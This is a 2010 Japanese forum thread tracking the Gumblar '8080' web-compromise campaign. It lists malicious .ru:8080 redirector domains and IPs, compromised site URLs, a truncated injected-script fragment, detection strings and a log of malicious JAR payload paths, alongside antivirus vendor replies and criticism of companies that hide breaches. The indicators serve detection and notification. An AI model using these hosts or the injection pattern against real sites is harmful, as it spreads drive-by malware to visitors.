8080 系ブラックサイト
---------------
ampsguide.ru
anycitytown.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
saletradeonline.ru
suesite.ru
sugaryhome.ru
superaguide.ru
superpropicks.ru
(次に続く)
293名無しさん@お腹いっぱい。:2010/01/22(金) 02:08:43
手持ちの*.ru:8080な奴をISPとGoogleさんちのDNSで試したけど
全部IPが引けなくなってしまった

>>285
これも全部アドレスが引けない

>>286
これも引けなかった

>>274
これだけアドレス引けたけど、どしたらいい?
217.23.5.27
91.121.4.99
91.121.167.41
94.23.11.38
94.23.206.229
294名無しさん@お腹いっぱい。:2010/01/22(金) 02:09:08
初回起動時も速くなったのかな
295292:2010/01/22(金) 02:09:20
>>292 のつづき

theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
webnetenglish.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
296名無しさん@お腹いっぱい。:2010/01/22(金) 02:11:02 BE:880120875-PLT(12031)
>>294
sqliteをアイドル時に自動で最適化するようになったから結構違うはず
297名無しさん@お腹いっぱい。:2010/01/22(金) 02:11:24
>>293
アドレスはコロコロ変わるよ
298名無しさん@お腹いっぱい。:2010/01/22(金) 02:17:35
>>296
CCleanerで小まめに最適化してる俺に隙はなかった
299名無しさん@お腹いっぱい。:2010/01/22(金) 02:22:51
>>280
とりあえずwhoisからめるすた。
300名無しさん@お腹いっぱい。:2010/01/22(金) 02:23:31
>>296
SQLite Optimizerお役ご免か
まあいいけど
301名無しさん@お腹いっぱい。:2010/01/22(金) 02:35:55
特徴的な難読化アルゴリズムがかえって検出に役立ってたのに…

ここで見え見えの平文に切り替えてくるとか、何という逆転の発想w

敵もさる者よのう
302名無しさん@お腹いっぱい。:2010/01/22(金) 02:39:29
「下手に難読化しなくても馬鹿なジャップだったら気づかないだろwwwww」とか思われてそうだし実際そうだから困る
303名無しさん@お腹いっぱい。:2010/01/22(金) 02:40:25
難読化されてもされてなくても気づかない奴は気づかないからなぁ
304名無しさん@お腹いっぱい。:2010/01/22(金) 02:41:56
鯖ハックして裏proxy網構築終わったからじゃね
もうru:8080はお役ご免, これからは今まで改ざんされた鯖が裏proxyになる。
これで正規のリダイレクトか不正のそれか区別出来なくなった
305名無しさん@お腹いっぱい。:2010/01/22(金) 02:52:36
>>302
お前が馬鹿なのがよく分かる書き込みだな
306名無しさん@お腹いっぱい。:2010/01/22(金) 03:09:01
ガンブラーマシン作った
どのサイトも安心してのぞける
307名無しさん@お腹いっぱい。:2010/01/22(金) 03:11:44
見逃してた

>>23,>>253
さくらにつーほーしますた。
308名無しさん@お腹いっぱい。:2010/01/22(金) 04:41:10
>>244
難読化されてる。。。
309名無しさん@お腹いっぱい。:2010/01/22(金) 04:42:58
リファラに陥落サイトのURLを突っk(ry
310名無しさん@お腹いっぱい。:2010/01/22(金) 04:46:43
/*Exception*/
311名無しさん@お腹いっぱい。:2010/01/22(金) 05:37:36
312名無しさん@お腹いっぱい。:2010/01/22(金) 05:46:33
 
313名無しさん@お腹いっぱい。:2010/01/22(金) 05:48:26
きたね

ウィンドウズ関連ファイル直リン倶楽部 其の20
http://pc12.2ch.net/test/read.cgi/win/1253284232/804-808
314名無しさん@お腹いっぱい。:2010/01/22(金) 05:58:02
315名無しさん@お腹いっぱい。:2010/01/22(金) 09:01:32
firefoxのVista以降の保護モード対応まだ?
保護モードに対応するまでIE使い続ける
316名無しさん@お腹いっぱい。:2010/01/22(金) 10:24:30
<script>/*Exception*/ document.write('<script src='+'h#(&t(t

ふぅ・・・
317名無しさん@お腹いっぱい。:2010/01/22(金) 10:51:44
東京財団 週末学校
hxxp://tkfd-shumatsu-gakko●jp/cat15/
コードだけ撤去して「告知せず」かよ

Googleのキャッシュ(アクセス注意)
tp://74.125.153.132/search?q=cache:AktNBszrpnwJ:tkfd-shumatsu-gakko.jp/cat15/+tkfd-shumatsu-gakko.jp/cat15&cd=1&hl=ja&ct=clnk&gl=jp
>このページは 2010年1月10日 16:55:12 GMT に取得されたものです。
ソースに/*LGPL*/が刻印されてるしw
318名無しさん@お腹いっぱい。:2010/01/22(金) 11:07:09
まあまあ
よく腐敗した組織だことw
319名無しさん@お腹いっぱい。:2010/01/22(金) 11:10:04
これだけあちこちで感染してるんだから
逆にその流れに紛れてきっちり謝罪したほうが
好感度↑なのにねぇ。あほすぐる
320名無しさん@お腹いっぱい。:2010/01/22(金) 11:14:54
ttp://www.tkfd.or●jp/news/detail.php?id=17
当財団ウェブサイトに関するお詫び

TOP 公募・お知らせ 当財団ウェブサイトに関するお詫び
更新日:2010/01/07
東京財団の日本語ウェブサイトにおいて、第3者による改ざんが確認され、
ウィルス感染の可能性があるページを一定時間公開していたことが判明いたしました。
ここにお知らせいたしますとともに、対象時間に当ホームページを閲覧された皆様に
ご迷惑をおかけしましたことをお詫び申しあげます。
サイト全体を確認した結果、1月6日11時54分現在、修正を完了しております。

■対象サイト
東京財団日本語ホームページ(http://www.tkfd.or.jp/内のページ
■対象時間
2010年1月5日19時30分ごろ〜1月6日正午ごろ
■内 容
第三者による改ざんにより、当財団ホームページの一部に不正な記述がなされ、
ウイルス感染の可能性があります。感染したパソコンでは、意図しないサイトへ
誘導されてしまう可能性があります。
321名無しさん@お腹いっぱい。:2010/01/22(金) 11:21:10
1/6に修正完了?
322名無しさん@お腹いっぱい。:2010/01/22(金) 11:25:36
これってどうなん?

ガンブラー再燃を契機にセキュリティの基本を見直そう - インタビュー:ITpro
ttp://itpro.nikkeibp.co.jp/article/Interview/20100120/343557/?ST=security

> 各社の正規サイト改ざんに使われた手口は調査中の段階ですが、盗まれたFTPサー
> バーのログイン情報が使われた可能性は低いと考えています。

> ガンブラー攻撃によるWeb改ざん手口は、Webアプリケーションのぜい弱性を攻撃
> する「SQLインジェクション」が主流です。今回のWeb改ざんも、おそらくSQLイン
> ジェクションによるものだと推測しています。
323名無しさん@お腹いっぱい。:2010/01/22(金) 11:25:40
「ホリプロ」サイト、ガンブラー感染公表せず
http://www.yomiuri.co.jp/net/security/s-news/20100122-OYT8T00417.htm
東京都は21日、東京芸術劇場(豊島区)の演目を案内する専用サイト
「東京芸術劇場チケットサービス」が改ざんされ、新型コンピューターウイルス「ガンブラー」に感染していたと発表した。

 現時点で個人情報流出などの被害報告はないという。サイト運営業者は今月9日に感染に気付いていたが公表せず
サイトが閉鎖されたのは19日になってからだった。先月17日以降に閲覧した人は感染の恐れがあるといい
この間のアクセス件数は2万3181件。

 発表によると、同劇場では今月19日、サイト利用者から「ウイルスに感染しているのではないか」との連絡を受け、サイトを閉鎖。
しかし、サイト運営を委託されている芸能事務所・ホリプロ(東京・目黒区)はこれより前の今月9日に、別の利用者からの指摘で感染に気付いていたが
公表していなかったという。

 同社は「担当者が重大性を認識しておらず、改ざん場所を復旧させただけで、公表しなかった。深く反省している」としている。
324名無しさん@お腹いっぱい。:2010/01/22(金) 11:33:13
>>322
固定コンテンツしか使ってないサイトもたくさんやられてるじゃん
だから普通にftpアカウント盗まれてるでしょ?
325名無しさん@お腹いっぱい。:2010/01/22(金) 11:44:05
>>323
で、今はホリプロのトップにお詫びの告知があるのか?
とてもとても見に行く気にはなれないけど
326名無しさん@お腹いっぱい。:2010/01/22(金) 11:53:41
>>322

トレンドマイクロ サポートサービス本部 セキュリティエンハンスメントサポートグループ Threat Monitoring Center 課長の飯田朝洋氏
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです

トレンドマイクロ終了のお知らせでした
327名無しさん@お腹いっぱい。:2010/01/22(金) 11:58:48
>>322
その記事のコメント欄に差分チェック&メール通知ASPのリンクが貼られてるね。
リンク先見てないけど宣伝?

ttp://websitesafe●net/
328名無しさん@お腹いっぱい。:2010/01/22(金) 12:03:48
>>317
> コードだけ撤去して「告知せず」かよ
そんなのいいほうだよ

ttp://www.ikumo-web.org/news/nanoimpact-trojan/
> 2010年1月2日(土)現在、ナノインパクトのHPにアクセスすると、ウイルス対策
> ソフトがトロイの木馬を検知します。以下参考ページの内容と同様の事象と推測
> しています。

> 2010年1月6日(水)、HPの管理者より問題が解決したの連絡を受けました。当サ
> イト管理者が確認したところ、連絡を受けた通り解決してました。
>
> 原因は不正改ざんではなく、過去に作成したファイルがサーバに残っており、そ
> れが原因とのことです。また、ウイルス感染もないとのことです。

ナノインパクトのHPとやら
ttp://www●nanoimpact●jp/
> 10.01.06 1月2日に一部のHPにてナノインパクトHPが不正改ざん、ウイルス感染の
> 可能性という 掲示が出ておりました。弊社で調査したところ原因は不正改ざんや
> ウイルス感染ではなく、過去に作成したファイルがサーバに残っていたために一部
> のウイルスセキュリティソフトにてウイルスと認識されておりました。該当ファイ
> ルを削除し、問題のないことを確認致しましたことをご報告致します。

ほほ〜ぅ>>監視モードスタート>>
2010/01/08 9:51 改ざん(/*LGPL*/埋め込み)
2010/01/12 22:42 修復
未だ告知なし

俺の中ではこいつらが最凶
329名無しさん@お腹いっぱい。:2010/01/22(金) 12:14:50
主流はSQLインジェクション、HPコンテンツ管理会社に責任なんか無いんだからねっ!
330名無しさん@お腹いっぱい。:2010/01/22(金) 12:16:18
企業は正直に話したほうがいいのにw
331名無しさん@お腹いっぱい。:2010/01/22(金) 12:25:43
GENOウイルスに対向して8080系はNANOウイルス
332名無しさん@お腹いっぱい。:2010/01/22(金) 12:33:51
不道徳企業はリスト化するのがベスト
333名無しさん@お腹いっぱい。:2010/01/22(金) 12:34:13
いいねえ
ことあるごとに、こっそり(のつもりで)修復して知らん振りの企業名を挙げてやればいい
334名無しさん@お腹いっぱい。:2010/01/22(金) 12:43:40
pana持ってる奴いる?検疫になんもファイル追加出来ないんだが
335名無しさん@お腹いっぱい。:2010/01/22(金) 12:47:31
>>326
トレンドはIDSやってないからねえ。
336名無しさん@お腹いっぱい。:2010/01/22(金) 12:48:14
>>328
これはw

もしかして専スレde大炎上を望んでる?
337名無しさん@お腹いっぱい。:2010/01/22(金) 12:50:23
今見たら>>235>>280は/*Exception*/だった
338名無しさん@お腹いっぱい。:2010/01/22(金) 12:50:59
>>336
誰かν側でスレたてすれば炎上?
339名無しさん@お腹いっぱい。:2010/01/22(金) 13:03:22
燃やすぞー
340名無しさん@お腹いっぱい。:2010/01/22(金) 13:12:56
>>328
うわあ
なんで傷口を広げるようなことを言うかねえ
341名無しさん@お腹いっぱい。:2010/01/22(金) 13:13:46
すみませんご迷惑をおかけしましただけで、あとは黙っておけばいいのにねー
342名無しさん@お腹いっぱい。:2010/01/22(金) 13:23:22
343名無しさん@お腹いっぱい。:2010/01/22(金) 13:29:03
>>328
流石だなww
344名無しさん@お腹いっぱい。:2010/01/22(金) 13:31:38
>>340
告知せず&意味不な事を書いて逃げるサイトは
消えて無くなった方が良いから。

隠す・逃げるサイトは徹底的に叩かれるべき
345名無しさん@お腹いっぱい。:2010/01/22(金) 13:34:35
株式会社ユノインターナショナル
〒541-0046 大阪市中央区平野町2-3-7 アーバンエース北浜ビル12F
〒541-0041 大阪市中央区北浜1-3-14 西川三井ビルディング10F
電話 06-6231-0550
FAX 06-6231-1077
[email protected]
346名無しさん@お腹いっぱい。:2010/01/22(金) 13:36:53
>>328
☆☆☆ スレ立て依頼所 ☆☆☆
http://tsushima.2ch.net/test/read.cgi/news/1263949139/
347名無しさん@お腹いっぱい。:2010/01/22(金) 13:39:55
馬鹿だなお前ら。黙りなんて他でもいくらでもいるだろうに
348名無しさん@お腹いっぱい。:2010/01/22(金) 13:42:06
社員レス
349名無しさん@お腹いっぱい。:2010/01/22(金) 13:52:15
いくらでもいるだろうけど
見つけ次第許さないよw
350名無しさん@お腹いっぱい。:2010/01/22(金) 13:57:18
立ててみた
ナノインパクトHPウイルス感染→スクリプト埋め込みを否定
http://tsushima.2ch.net/test/read.cgi/news/1264136190/
351名無しさん@お腹いっぱい。:2010/01/22(金) 14:00:03
素人向けに説明しないと炎上どころか書き込みもなくなるぞ
352名無しさん@お腹いっぱい。:2010/01/22(金) 14:01:08
ν速なんて馬鹿しかいないんだからもっとわかりやすいネタじゃないと伸びないよ
>>1なんて読まないし
353名無しさん@お腹いっぱい。:2010/01/22(金) 14:01:16
>>350
乙と言いたいところだが・・・
説明不足だろJK・・・
354名無しさん@お腹いっぱい。:2010/01/22(金) 14:04:58
やられたサイトなんて山のようにあるから、
マイナーサイトなんてやられてましたすいませんって謝っておくか完全無視きめこんどけば
話題にもならないのに

わざわざ嘘ついて話題になるとか狙ってんのか?
355名無しさん@お腹いっぱい。:2010/01/22(金) 14:07:05
悪名でも有名ってことかねえ〜w
経営陣が社員に恨まれてるとかかも?
356名無しさん@お腹いっぱい。:2010/01/22(金) 14:22:51
>>328
一番たち悪いな
357名無しさん@お腹いっぱい。:2010/01/22(金) 14:32:42
>>349
働けよ
358名無しさん@お腹いっぱい。:2010/01/22(金) 14:34:41
たけし「働けよ」
359名無しさん@お腹いっぱい。:2010/01/22(金) 14:44:44
ガンブラーウイルス対策まとめサイト
日本コンピュータセキュリティインシデント対応チーム協議会
http://www.nca.gr.jp/2010/netanzen/index.html
360名無しさん@お腹いっぱい。:2010/01/22(金) 14:50:17
自分も働いてるから許せないのに
働くことに対するポリシーの無い人は,自分さえ感染しなきゃおkなの?
361名無しさん@お腹いっぱい。:2010/01/22(金) 14:51:15
ニートは自己の正当化しかしない
362名無しさん@お腹いっぱい。:2010/01/22(金) 14:58:52
セキュ板ってニート少なそうな印象なんだけど
煽り文句は板別に設定すべきだと思うよ
363名無しさん@お腹いっぱい。:2010/01/22(金) 15:27:53
セキュ板は書き込みの過半数が自宅警備員w
364名無しさん@お腹いっぱい。:2010/01/22(金) 15:37:46
>>347
悔しかったら告知&お詫びしろ

話 は そ れ か ら だ
365名無しさん@お腹いっぱい。:2010/01/22(金) 15:40:21
×自宅警備
○ホームセキュリティ
366名無しさん@お腹いっぱい。:2010/01/22(金) 15:51:57
   γ⌒ヽ
   < `∀´>
  < つ=つ
  ノ   ノ三)
∠、 m)=m)
367名無しさん@お腹いっぱい。:2010/01/22(金) 15:52:58
マジか
ホームセキュリティの人が検体送付とか電凸とかマメにしてくれてんのか
368名無しさん@お腹いっぱい。:2010/01/22(金) 15:59:36
ネットの平和守られてんじゃん
馬鹿に出来ねえ
369名無しさん@お腹いっぱい。:2010/01/22(金) 16:18:29
なんでlが全角になっちゃったんだろう…

『/*GNU GPL*/』→『/*LGPL*/』→『/*handle exception*/』
となってってるそうで。
難読化も無く判断しづらい物になってるらしい。悪質だね。
370名無しさん@お腹いっぱい。:2010/01/22(金) 16:20:03
ごめんよ、ageた上に誤爆。
371名無しさん@お腹いっぱい。:2010/01/22(金) 16:59:46
1日10アクセスもない俺の個人サイトさえ改ざんの告知したというのに告知しない企業ときたら

利用者はグーグルロボット2名でした
372名無しさん@お腹いっぱい。:2010/01/22(金) 17:02:43
>>371
www
373名無しさん@お腹いっぱい。:2010/01/22(金) 17:03:10
>>235
凸完了

HPを作っているのはHP製作会社ではなく
友人にお願いをして作って貰ったとか。。
374名無しさん@お腹いっぱい。:2010/01/22(金) 17:10:50
>>371
おまえは偉い
375名無しさん@お腹いっぱい。:2010/01/22(金) 17:12:30
376名無しさん@お腹いっぱい。:2010/01/22(金) 17:13:16
>>371
サイト運営者の鏡だよ
アク解に残ってない閲覧者もいるかもしれないし
377名無しさん@お腹いっぱい。:2010/01/22(金) 17:17:48
>>373
シネ基地外。何してやったりな顔してんだよw
378名無しさん@お腹いっぱい。:2010/01/22(金) 17:19:11
>>377
あたま大丈夫か?
何に毒されたらそうなっちゃうの?
379名無しさん@お腹いっぱい。:2010/01/22(金) 17:26:10
>>376
アクセス解析に残ってない閲覧者って何だよ?
380名無しさん@お腹いっぱい。:2010/01/22(金) 17:28:57
>>379
アク解に残らないようにするブラウザ用アドオンとか出回ってるんだけど知らない?
hostsに書き込んで拒否してる人も結構いるし
381名無しさん@お腹いっぱい。:2010/01/22(金) 17:30:49
Ninjaの手裏剣クルクルとかうざいからな
382名無しさん@お腹いっぱい。:2010/01/22(金) 17:31:34
apacheのログファイル見ろksg
383名無しさん@お腹いっぱい。:2010/01/22(金) 17:34:34
無料スペースだろどうせ
384名無しさん@お腹いっぱい。:2010/01/22(金) 17:40:19
>>378
かわいそす
385名無しさん@お腹いっぱい。:2010/01/22(金) 17:42:27
ぶつぶつ言っても何もかわらないよ
386名無しさん@お腹いっぱい。:2010/01/22(金) 17:49:23
つtwitter
387名無しさん@お腹いっぱい。:2010/01/22(金) 17:50:23
凸されてファビョってるのはされた本人かね?
そうだよねシス管として致命的だもんね
恥ずかしいよね
388名無しさん@お腹いっぱい。:2010/01/22(金) 17:54:52
疑問
何故海外からのアクセスを許しているのか?(FTP鯖)
せめて国内オンリーにしろよ・・・
389名無しさん@お腹いっぱい。:2010/01/22(金) 18:04:19
>>388
どうやって設定すればいいの?
390名無しさん@お腹いっぱい。:2010/01/22(金) 18:07:56
netはじいたらyahooから更新できなくなるとか
いろんなプロバイダを使ってるから一律拒否出来ない
海外禁止ってやるのはいいが拒否するドメイン全て登録させるとか出来ない
それにもし許可リストを使うにしてもリストの管理はサーバ屋に頼めば基本有料になるはず
391名無しさん@お腹いっぱい。:2010/01/22(金) 18:09:25
>>379
本体じゃなくGoogleキャッシュで見てるとか?
392名無しさん@お腹いっぱい。:2010/01/22(金) 18:17:19
>>389
GeoIPとiptable等のパケットフィルタでおkだろ
393名無しさん@お腹いっぱい。:2010/01/22(金) 18:26:50
>>391
アク解もキャッシュされてたらそれでも足跡残るよ
394名無しさん@お腹いっぱい。:2010/01/22(金) 18:37:18
野暮な質問だけど
こういうウイルス作ったり
不正アクセスでサイト改ざんしたら捕まるの?
その主犯を捕まえることはできないの?
教えてエロイ人
395名無しさん@お腹いっぱい。:2010/01/22(金) 18:39:23
日本でやったら日本の法律に引っかかる
396名無しさん@お腹いっぱい。:2010/01/22(金) 18:42:54
野暮ってこんなときに使うっけ
397名無しさん@お腹いっぱい。:2010/01/22(金) 18:48:51
PCを物理的に破壊したら器物破損もプラスされるんだっけ
398名無しさん@お腹いっぱい。:2010/01/22(金) 18:51:37
新たに20件のサイト改ざんが明らかに〜新規改ざんサイト一覧
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2129

>なお、改ざんを告知せずにこっそり該当部分を修正し、何事もなかったかのように再開している
>悪質ともいえるサイトもたくさんある中、正直に改ざんの事実を告げて謝罪し、ユーザーに対応を
>促しているサイトだということを付言しておきたい。
399名無しさん@お腹いっぱい。:2010/01/22(金) 18:57:06
>>375
ブログに貼っていい?
400名無しさん@お腹いっぱい。:2010/01/22(金) 18:58:08
>>285,292
質問。この辺にあるアドレスが含まれてるjavaコードは
genoウイルスの可能性があるってことでいいんですか?
401名無しさん@お腹いっぱい。:2010/01/22(金) 19:00:00
genoって言われるとなあ
402名無しさん@お腹いっぱい。:2010/01/22(金) 19:02:55
operaのブロックコンテンツで*.ru.*入れときゃ大丈夫かな
403名無しさん@お腹いっぱい。:2010/01/22(金) 19:10:31
.ru じゃなくなったとたんにあぼ〜ん
気休めだな
404名無しさん@お腹いっぱい。:2010/01/22(金) 19:13:13
>>401
通ってるサイトに上にあるURLが含まれた変なコードがくっ付いているんです
genoかと思って調べてたらここにたどり着きましたもので。

ウイルスじゃなくて、あまり問題ない物ならいいんですけど
メールで一言伝えようか迷ってたもんで
405名無しさん@お腹いっぱい。:2010/01/22(金) 19:15:09
GENOじゃないきゃいいのか?w
見てやるからさらせよそのサイト
406名無しさん@お腹いっぱい。:2010/01/22(金) 19:31:34
>見てやるからさらせよそのサイト

404が直リンする予感
407名無しさん@お腹いっぱい。:2010/01/22(金) 19:49:21
>>284
nikkansportsって・・・
ソフト更新はしてるけどやべぇな
408名無しさん@お腹いっぱい。:2010/01/22(金) 20:27:54
>>404
知り合いなら伝えてやればいいけど
そうじゃないなら本人じゃなく管理会社に伝えた方が正確かもしれん
409名無しさん@お腹いっぱい。:2010/01/22(金) 21:31:26
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2130

>新たなコードを埋め込まれたサイトの中には、修復済みだったはずのサイトもいくつか含まれている。
そんな間抜けな修復を行う管理者もアレだが、歯止めがかからんな
告知不足、不完全ってのもあるのかな・・・・
410名無しさん@お腹いっぱい。:2010/01/22(金) 21:32:49
BBSecが、「Gumblar(ガンブラー)対策トータルソリューション」の販売を開始
ttp://www.bbsec.co.jp/aboutus/press/100122.html

私は、こういう銭ゲバみたいなのは嫌いだ
411名無しさん@お腹いっぱい。:2010/01/22(金) 22:18:40
412名無しさん@お腹いっぱい。:2010/01/22(金) 22:33:21
>>411
それ、まさかそのスレッドがやられているってこと?
正直に話してくれ
413名無しさん@お腹いっぱい。:2010/01/22(金) 22:34:23
>正直に話してくれ
ワロタ
414名無しさん@お腹いっぱい。:2010/01/22(金) 22:36:30
>>412
貼られてるリンク先だよ
安心しろよw
415名無しさん@お腹いっぱい。:2010/01/22(金) 22:37:20
416名無しさん@お腹いっぱい。:2010/01/22(金) 22:40:44
>>411
検出NODだけ
http://www.virustotal.com/analisis/380466ea50ef6cd7ffdc7e35ad756ee9a4f8736474aa0e7552ad6889c1012382-1264167242

avastには検体提出済み
誰か他のもよろしく
417名無しさん@お腹いっぱい。:2010/01/22(金) 22:42:39
マグペケか
418名無しさん@お腹いっぱい。:2010/01/22(金) 22:47:04
一体NODに何があったというのだ
化け物か
419名無しさん@お腹いっぱい。:2010/01/22(金) 22:56:20
なんかのランキングだとNOD最強らしいじゃん、こないだまでゴミじゃなかった?
420名無しさん@お腹いっぱい。:2010/01/22(金) 22:57:47
>>419
あれってあてにならないんじゃなかった?
421名無しさん@お腹いっぱい。:2010/01/22(金) 23:00:08
SRIだろ?
あれはネタにもならない
422名無しさん@お腹いっぱい。:2010/01/22(金) 23:06:29
まさか中の人が派生種作ってるんじゃ
423名無しさん@お腹いっぱい。:2010/01/22(金) 23:08:01
>>411 cobalttrueblue.ru:8080
424名無しさん@お腹いっぱい。:2010/01/22(金) 23:08:46
コバルト8080
425名無しさん@お腹いっぱい。:2010/01/22(金) 23:13:51
>>350
見てきた

> 23 名前: モンドリ(東京都)[] 投稿日:2010/01/22(金) 16:36:14.22 ID:AdO+SHBS ?2BP(778)
> キャッシュ消せば大丈夫って
> ウイルスに詳しいGENOの店の人がいってただろ!

このレス見れただけで満足だわ 懐かしいなw色々と半年前のこと思い出したわww
426名無しさん@お腹いっぱい。:2010/01/22(金) 23:22:05
>>398
告知もせず無視決め込んだパルコールは勝ちだな
427名無しさん@お腹いっぱい。:2010/01/22(金) 23:27:05
白痴ランド,昨日直ってた後は告知してなかったな
このままにする気かな
428名無しさん@お腹いっぱい。:2010/01/23(土) 00:13:41
>>411,>>416
かすぺ
> Hello,
>
>
> index.html, scooooop.html - Trojan-Downloader.JS.Pegel.c
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Regards, Vorobiov Vitaly
> Virus Analyst
429名無しさん@お腹いっぱい。:2010/01/23(土) 00:16:52
熊親父
430名無しさん@お腹いっぱい。:2010/01/23(土) 00:19:29
やっべかすがに見えたwwwwww

なんでかすがが出てくるんだろう
431名無しさん@お腹いっぱい。:2010/01/23(土) 00:51:06
AVGの常駐ガードは優秀だな。
432名無しさん@お腹いっぱい。:2010/01/23(土) 01:05:21
>>431
どこがだよ
433名無しさん@お腹いっぱい。:2010/01/23(土) 01:26:58
過去に3回ほど何かしらに連絡したけど、改竄されてましたって告知したのは無かったな。
434名無しさん@お腹いっぱい。:2010/01/23(土) 02:27:21
http://green●ribbon●to/~fakestar/
/*Exception*/ さんは新型か
genuinehollywood.ruを追加
435名無しさん@お腹いっぱい。:2010/01/23(土) 02:31:33
401 えらぁ
tkfd-shumatsu-gakko●jp
436名無しさん@お腹いっぱい。:2010/01/23(土) 03:14:55
>>434
ribbon.toにめる
437名無しさん@お腹いっぱい。:2010/01/23(土) 03:20:41
ttp://f35.aaa.livedoor●jp/~gotozoo/
yourtruemate.ru
438名無しさん@お腹いっぱい。:2010/01/23(土) 03:32:07
view-source: で見ても大丈夫だよね?
439名無しさん@お腹いっぱい。:2010/01/23(土) 03:45:27
これって「*.com*.com*」で阻止できるんじゃね?

440名無しさん@お腹いっぱい。:2010/01/23(土) 03:46:51
>>438
chromeだとview-source:で危険なサイトでブロックされると、
表示許可したときにソースではなく普通に表示されたような気がする
ブロックされなければ平気
441名無しさん@お腹いっぱい。:2010/01/23(土) 03:53:14
GumblarCheckerの管理人さん。
もし見ていたら、「Gumblarウイルスからコンピュータを保護する」ページのFirefoxの項目は
修正することを提言しておきます。
3.6ではツール-オプション-コンテンツの「Javaを有効にする」は無くなっていますので。

FirefoxをJavaを無効にする方法はこちらを紹介した方がよいのではないでしょうか?

Java アプレットを無効にするには
ttp://support.mozilla.com/ja/kb/Java%20%E3%82%A2%E3%83%97%E3%83%AC%E3%83%83%E3%83%88%E3%82%92%E7%84%A1%E5%8A%B9%E3%81%AB%E3%81%99%E3%82%8B%E3%81%AB%E3%81%AF
442名無しさん@お腹いっぱい。:2010/01/23(土) 03:54:16
>>437
一応そこの管理人にめるしたけど、スパム扱いされるの必至なので
ドメインから逝こうとしてライブドアかと思ったらAAA!CAFEなのね。。。
443名無しさん@お腹いっぱい。:2010/01/23(土) 03:56:20
>>440
あんがと。
 >>437 を見てみたけど ESETでブロックされた。
怖いからもう止めますw
444名無しさん@お腹いっぱい。:2010/01/23(土) 04:05:22
>>437
Sophosきてました。
http://www.virustotal.com/analisis/e064a38951cdc837dcc80a7093cc4eb2f19fab6753268f74d7928ab1874baf22-1264184719
File index.htm received on 2010.01.22 18:25:19 (UTC)
Result: 3/40 (7.50%)
Kaspersky 7.0.0.125 2010.01.22 Trojan-Downloader.JS.Pegel.c
NOD32 4797 2010.01.22 JS/TrojanDownloader.Agent.NRO
Sophos 4.50.0 2010.01.22 Troj/JSRedir-AR
445名無しさん@お腹いっぱい。:2010/01/23(土) 04:12:47
>>411,>>416
Avira
> Filename Result
> index.html MALWARE
> The file 'index.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.33127.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
>
>
> Filename Result
> scooooop.html MALWARE
> The file 'scooooop.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.505009.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
446名無しさん@お腹いっぱい。:2010/01/23(土) 04:16:14
>>411,>>416
Fortinet
> Dear Customer,
>
> We have analyzed the sample you provided and developed the
> pattern to catch it. We will add detection for this sample
> in the next regular update.
>
> The sample you submitted will be detected as "JS/MalRedir.B!tr.dldr".
>
> Regards,
> --
> Alexandre Aumoine
> Anti-Virus Analyst, Threat Response Team - EMEA
>
> To submit a suspicious file to Fortinet:
> http://www.fortinet.com/FortiGuardCenter/virus_scanner.html
447名無しさん@お腹いっぱい。:2010/01/23(土) 04:21:27
448名無しさん@お腹いっぱい。:2010/01/23(土) 04:52:25
http://www●adkako7●com/ikesei/を開いたらカスペがトロイに反応しました。
カスペのログを見るとこのようになっています。
許可しました http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar
OK http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/META-INF/MANIFEST●MF
OK http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/PayloadX●class
OK http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/AppletX●class
検出&禁止しました http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/LoaderX●class
許可しました http://icq-com●bangbros1●com●adsrevenue-net●genuinecolors●ru:8080/pics/myf/y/AppletX●class

再現しようとしてもカスペのログに何も表示されません。
OKしたものや最後の許可で私が感染済なので無反応なのでしょうか?
449名無しさん@お腹いっぱい。:2010/01/23(土) 05:00:09
■Gumblar.cn(Gumblar、Gumblar.x)
現在冬眠中。のはずだが・・
ttp://www.google.com/safebrowsing/diagnostic?site=Gumblar.cn&hl=ja
センセイは毎日捕捉中w

■Gumblar.8080系(と呼ぶことになったらしい)
/*LGPL*/:ちょっと迷走した後/*Exception*/に進化
※世界各地で絶賛バージョンアップ中。
検索ワード:"<script>/*Exception*/ document.write("+"<script src"

/*CODE1*/:弾かれまくるので追跡を断念
※情報求ム

■何故かスルーされる亜種っぽいやつ
<script>function〜:8080系の亜種?
少しずつ減ってきたっぽい。
450名無しさん@お腹いっぱい。:2010/01/23(土) 05:21:17
>>448
一度アクセスしたIPははじかれるらしいので試すならIP変えないとだめだね
でもそういうデザインの感染サイトすごくいっぱいあるよね
451名無しさん@お腹いっぱい。:2010/01/23(土) 07:45:55 BE:603512238-PLT(12031)
>>441
直しました
IETabが3.6に対応したらまた書き直す
452名無しさん@お腹いっぱい。:2010/01/23(土) 10:18:17
関西の自主上映団体
ttp://www.rcsmovie.co●jp/
453名無しさん@お腹いっぱい。:2010/01/23(土) 10:31:19
>>452
ワーオ、そこ京都(大阪でも?)ではそこそこ有名よ〜
単館上映映画見る人がかなりチェックしてると思う。
454名無しさん@お腹いっぱい。:2010/01/23(土) 11:06:41
串通せば感染する。

ただ、Gumblarに感染後、forhomessale.ru に感染した旨を通知する通信が発生するらしいんだが
